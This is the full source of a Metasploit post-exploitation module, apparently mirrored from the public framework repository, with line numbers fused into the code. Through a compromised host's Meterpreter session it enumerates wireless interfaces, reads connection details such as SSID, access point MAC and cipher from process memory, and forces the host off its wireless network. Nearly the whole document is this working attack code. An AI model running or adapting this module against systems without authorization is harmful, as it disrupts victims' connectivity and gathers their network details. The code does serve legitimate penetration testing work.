CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/post/windows/wlan/wlan_disconnect.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Auxiliary::Report78def initialize(info = {})9super(10update_info(11info,12'Name' => 'Windows Disconnect Wireless Connection',13'Description' => %q{14This module disconnects the current wireless network connection15on the specified interface.16},17'License' => MSF_LICENSE,18'Author' => ['theLightCosine'],19'Platform' => [ 'win' ],20'SessionTypes' => [ 'meterpreter' ],21'Compat' => {22'Meterpreter' => {23'Commands' => %w[24stdapi_railgun_api25stdapi_sys_process_attach26stdapi_sys_process_getpid27]28}29}30)31)3233register_options([34OptInt.new('Interface', [true, 'The Index of the Interface to Disconnect. Leave at 0 if only one IF', 0])35])36end3738def run39# Opens memory access into the host process40mypid = client.sys.process.getpid41@host_process = client.sys.process.open(mypid, PROCESS_ALL_ACCESS)42@wlanapi = client.railgun.wlanapi4344wlan_connections = "Wireless LAN Active Connections: \n"45wlan_handle = open_handle46unless wlan_handle47print_error("Couldn't open WlanAPI Handle. WLAN API may not be installed on target")48print_error('On Windows XP this could also mean the Wireless Zero Configuration Service is turned off')49return50end51wlan_iflist = enum_interfaces(wlan_handle)52if wlan_iflist[datastore['Interface']]53connect_info = query_current_connection(wlan_handle, wlan_iflist[datastore['Interface']]['guid'])54if connect_info55guid = guid_to_string(wlan_iflist[datastore['Interface']]['guid'])56wlan_connection = "GUID: #{guid} \nDescription: #{wlan_iflist[datastore['Interface']]['description']} \nState: #{wlan_iflist[datastore['Interface']]['state']}\n"57wlan_connection << "Currently Connected to: \n"58wlan_connection << "\tMode: #{connect_info['mode']} \n\tProfile: #{connect_info['profile']} \n"59wlan_connection << "\tSSID: #{connect_info['ssid']} \n\tAP MAC: #{connect_info['bssid']} \n"60wlan_connection << "\tBSS Type: #{connect_info['type']} \n\tPhysical Type: #{connect_info['physical']} \n"61wlan_connection << "\tSignal Strength: #{connect_info['signal']} \n\tRX Rate: #{connect_info['rxrate']} \n"62wlan_connection << "\tTX Rate: #{connect_info['txrate']} \n\tSecurity Enabled: #{connect_info['security']} \n"63wlan_connection << "\toneX Enabled: #{connect_info['oneX']} \n\tAuthentication Algorithm: #{connect_info['auth']} \n"64wlan_connection << "\tCipher Algorithm: #{connect_info['cipher']} \n"65print_status(wlan_connection)6667print_status('Disconnecting...')68@wlanapi.WlanDisconnect(wlan_handle, wlan_iflist[datastore['Interface']]['guid'], nil)69sleep(10)7071connected = query_current_connection(wlan_handle, wlan_iflist[datastore['Interface']]['guid'])72if connected73print_error('The Interface still appears to be connected.')74closehandle = @wlanapi.WlanCloseHandle(wlan_handle, nil)75if closehandle['return'] == 076print_status('WlanAPI Handle Closed Successfully')77else78print_error('There was an error closing the Handle')79end80return81else82print_good('The Interface has been disconnected successfully')83end84else85print_error('This Interface is not currently connected to a network.')86closehandle = @wlanapi.WlanCloseHandle(wlan_handle, nil)87if closehandle['return'] == 088print_status('WlanAPI Handle Closed Successfully')89else90print_error('There was an error closing the Handle')91end92return93end94else95print_error('The Supplied Interface Index is Invalid')96closehandle = @wlanapi.WlanCloseHandle(wlan_handle, nil)97if closehandle['return'] == 098print_status('WlanAPI Handle Closed Successfully')99else100print_error('There was an error closing the Handle')101end102return103end104105# close the Wlan API Handle106closehandle = @wlanapi.WlanCloseHandle(wlan_handle, nil)107if closehandle['return'] == 0108print_status('WlanAPI Handle Closed Successfully')109else110print_error('There was an error closing the Handle')111end112end113114def open_handle115begin116wlhandle = @wlanapi.WlanOpenHandle(2, nil, 4, 4)117rescue StandardError118return nil119end120return wlhandle['phClientHandle']121end122123def query_current_connection(wlan_handle, guid)124connection = {}125conn_info = @wlanapi.WlanQueryInterface(wlan_handle, guid, 7, nil, 4, 4, nil)126127# Grab the pointer to our data structure. We skip voer the Interface State since we already have it128# We interpret the connection mode used first129pointer = conn_info['ppData']130pointer = (pointer + 4)131mode = @host_process.memory.read(pointer, 4)132mode = mode.unpack('V')[0]133case mode134when 0135connection['mode'] = 'A profile is used to make the connection.'136when 1137connection['mode'] = 'A temporary profile is used to make the connection.'138when 2139connection['mode'] = 'Secure discovery is used to make the connection.'140when 3141connection['mode'] = 'Unsecure discovery is used to make the connection.'142when 4143connection['mode'] = 'connection initiated by wireless service automatically using a persistent profile.'144when 5145connection['mode'] = 'Invalid connection mode.'146else147connection['state'] = 'Unknown connection Mode.'148end149150# Grab the wirelessprofile name used in the connection151pointer = (pointer + 4)152profile = @host_process.memory.read(pointer, 512)153connection['profile'] = profile.gsub(/\x00/, '')154155# Check the size of the SSID value. If we get nothing back, the interface is not currently connected156# We return nil and deal with the results back in the calling function157pointer = (pointer + 512)158len_ssid = @host_process.memory.read(pointer, 4)159unless len_ssid.unpack('V')[0]160return nil161end162163# Grabs the SSID of the BSS connected to164pointer = (pointer + 4)165ssid = @host_process.memory.read(pointer, 32)166connection['ssid'] = ssid.gsub(/\x00/, '')167168# Grabs what type of a BSS this is and itnerpretes it into human readable169pointer = (pointer + 32)170bsstype = @host_process.memory.read(pointer, 4)171bsstype = bsstype.unpack('V')[0]172case bsstype173when 1174connection['type'] = 'Infrastructure'175when 2176connection['type'] = 'Independent'177when 3178connection['type'] = 'Any'179else180connection['type'] = 'Unknown BSS Type'181end182183# Grabs the BSS MAC address184pointer = (pointer + 4)185bssid = @host_process.memory.read(pointer, 6)186bssid = bssid.unpack('H*')[0]187bssid.insert(2, ':')188bssid.insert(5, ':')189bssid.insert(8, ':')190bssid.insert(11, ':')191bssid.insert(14, ':')192connection['bssid'] = bssid193194# Grabs the physical association type and interprets it into human readable195pointer = (pointer + 8)196phy_type = @host_process.memory.read(pointer, 4)197phy_type = phy_type.unpack('V')[0]198case phy_type199when 1200connection['physical'] = 'Frequency-hopping spread-spectrum (FHSS)'201when 2202connection['physical'] = 'Direct sequence spread spectrum (DSSS)'203when 3204connection['physical'] = 'Infrared (IR) baseband'205when 4206connection['physical'] = 'Orthogonal frequency division multiplexing (OFDM)'207when 5208connection['physical'] = 'High-rate DSSS (HRDSSS)'209when 6210connection['physical'] = 'Extended rate PHY type'211when 7212connection['physical'] = '802.11n PHY type'213else214connection['physical'] = 'Unknown Association Type'215end216217# Grabs the signal strength value218pointer = (pointer + 8)219signal = @host_process.memory.read(pointer, 4)220connection['signal'] = signal.unpack('V')[0]221222# Grabs the recieve rate value223pointer = (pointer + 4)224rxrate = @host_process.memory.read(pointer, 4)225connection['rxrate'] = rxrate.unpack('V')[0]226227# Grabs the transmit rate value228pointer = (pointer + 4)229txrate = @host_process.memory.read(pointer, 4)230connection['txrate'] = txrate.unpack('V')[0]231232# Checks if security is enabled on this BSS233pointer = (pointer + 4)234security_enabled = @host_process.memory.read(pointer, 4)235if security_enabled.unpack('V')[0] == 1236connection['security'] = 'Yes'237else238connection['security'] = 'No'239end240241# Checks of 802.1x Authentication is used242pointer = (pointer + 4)243onex = @host_process.memory.read(pointer, 4)244if onex.unpack('V')[0] == 1245connection['oneX'] = 'Yes'246else247connection['oneX'] = 'No'248end249250# Determines wat Authentication Algorithm is being used251pointer = (pointer + 4)252algo = @host_process.memory.read(pointer, 4)253algo = algo.unpack('V')[0]254case algo255when 1256connection['auth'] = '802.11 Open'257when 2258connection['auth'] = '802.11 Shared'259when 3260connection['auth'] = 'WPA'261when 4262connection['auth'] = 'WPA-PSK'263when 5264connection['auth'] = 'WPA-None'265when 6266connection['auth'] = 'RSNA'267when 7268connection['auth'] = 'RSNA with PSK'269else270connection['auth'] = 'Unknown Algorithm'271end272273# Determines what Cipher is being used274pointer = (pointer + 4)275cipher = @host_process.memory.read(pointer, 4)276cipher = cipher.unpack('V')[0]277case cipher278when 0279connection['cipher'] = 'None'280when 1281connection['cipher'] = 'WEP-40'282when 2283connection['cipher'] = 'TKIP'284when 4285connection['cipher'] = 'CCMP'286when 5287connection['cipher'] = 'WEP-104'288when 256289connection['cipher'] = 'Use Group Key'290when 257291connection['cipher'] = 'WEP'292else293connection['cipher'] = 'Unknown Cipher'294end295return connection296end297298def enum_interfaces(wlan_handle)299iflist = @wlanapi.WlanEnumInterfaces(wlan_handle, nil, 4)300pointer = iflist['ppInterfaceList']301302numifs = @host_process.memory.read(pointer, 4)303numifs = numifs.unpack('V')[0]304interfaces = []305306# Set the pointer ahead to the first element in the array307pointer = (pointer + 8)308(1..numifs).each do |_i|309interface = {}310# Read the GUID (16 bytes)311interface['guid'] = @host_process.memory.read(pointer, 16)312pointer = (pointer + 16)313# Read the description(up to 512 bytes)314interface['description'] = @host_process.memory.read(pointer, 512)315pointer = (pointer + 512)316# Read the state of the interface (4 bytes)317state = @host_process.memory.read(pointer, 4)318pointer = (pointer + 4)319320# Turn the state into human readable form321state = state.unpack('V')[0]322case state323when 0324interface['state'] = 'The interface is not ready to operate.'325when 1326interface['state'] = 'The interface is connected to a network.'327when 2328interface['state'] = 'The interface is the first node in an ad hoc network. No peer has connected.'329when 3330interface['state'] = 'The interface is disconnecting from the current network.'331when 4332interface['state'] = 'The interface is not connected to any network.'333when 5334interface['state'] = 'The interface is attempting to associate with a network.'335when 6336interface['state'] = 'Auto configuration is discovering the settings for the network.'337when 7338interface['state'] = 'The interface is in the process of authenticating.'339else340interface['state'] = 'Unknown State'341end342interfaces << interface343end344return interfaces345end346347# Convert the GUID to human readable form348def guid_to_string(guid)349aguid = guid.unpack('H*')[0]350sguid = '{' + aguid[6, 2] + aguid[4, 2] + aguid[2, 2] + aguid[0, 2]351sguid << '-' + aguid[10, 2] + aguid[8, 2] + '-' + aguid[14, 2] + aguid[12, 2] + '-' + aguid[16, 4]352sguid << '-' + aguid[20, 12] + '}'353return sguid354end355end356357358